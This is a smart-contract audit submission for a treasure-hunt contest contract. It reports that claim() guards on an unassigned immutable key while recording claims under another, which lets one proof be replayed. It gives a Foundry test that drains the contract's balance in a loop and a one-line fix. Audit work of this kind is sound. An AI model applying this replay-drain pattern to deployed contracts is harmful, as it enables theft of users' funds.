SNARKeling Treasure Hunt

First Flight #59

Beginner FriendlyGameFiFoundry

100 EXP

View all submissions

Previous Next

Submission Details

Impact: high

Likelihood: high

Replay protection bypass due to incorrect mapping key enables repeated claims and full fund drain

Author Revealed upon completion

Root + Impact

Description

The claim() function is intended to mark a treasure as claimed after a valid proof is submitted, preventing the same proof from being used again. The replay guard checks claimed[_treasureHash], where _treasureHash is a private immutable that is never assigned and defaults to bytes32(0). However, the claim is recorded using the function parameter claimed[treasureHash]. Since these keys differ, the check and the write operate on different storage slots, causing the replay protection to never trigger.

// _treasureHash is declared but never assigned in the constructor → always bytes32(0)

bytes32 private immutable _treasureHash;

function claim(bytes calldata proof, bytes32 treasureHash, address payable recipient) external nonReentrant() {

// @> always checks claimed[bytes32(0)] — never true, replay protection never fires

if (claimed[_treasureHash]) revert AlreadyClaimed(treasureHash);

...

// @> correctly marks claimed[treasureHash] but this slot is never read by the guard above

_markClaimed(treasureHash);

}

Risk

Likelihood:

Any participant who finds a treasure has a valid proof with their address as recipient
Replaying requires no additional capital — same calldata submitted multiple times
No special access or timing required — works any time the contract is unpaused and funded

Impact:

Full contract drain of up to MAX_TREASURES × REWARD using a single valid proof
claimsCount hits MAX_TREASURES via replay, permanently locking out all legitimate finders with AllTreasuresClaimed
Contract state corrupted — remaining treasure hashes appear unclaimed via isClaimed() but can never be claimed

Proof of Concept

// Assumes attacker has a single valid proof for one treasure

contract MockVerifier is IVerifier {

// Mock Verifying function which always returns true

function verify(bytes calldata, bytes32[] calldata) external pure override returns (bool) {

return true;

}

//Replay attack by claiming reward with same proof until attacker drains all the fund

function testReplayAttackDrainsContract() public {

bytes memory proof = hex"deadbeef";

bytes32 treasureHash = bytes32(uint256(1)); // Anything non zero

vm.startPrank(attacker);

for (uint256 i = 0; i < hunt.MAX_TREASURES(); i++) {

hunt.claim(proof, treasureHash, payable(recipient));

}

vm.stopPrank();

assertEq(address(hunt).balance, 0);

assertEq(recipient.balance, 100 ether);

assertEq(hunt.claimsCount(), 10);

}

Recommended Mitigation

- if (claimed[_treasureHash]) revert AlreadyClaimed(treasureHash);

+ if (claimed[treasureHash]) revert AlreadyClaimed(treasureHash);

// Also remove the unused _treasureHash immutable entirely.

Rewards breakdown

nSLOC

220

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!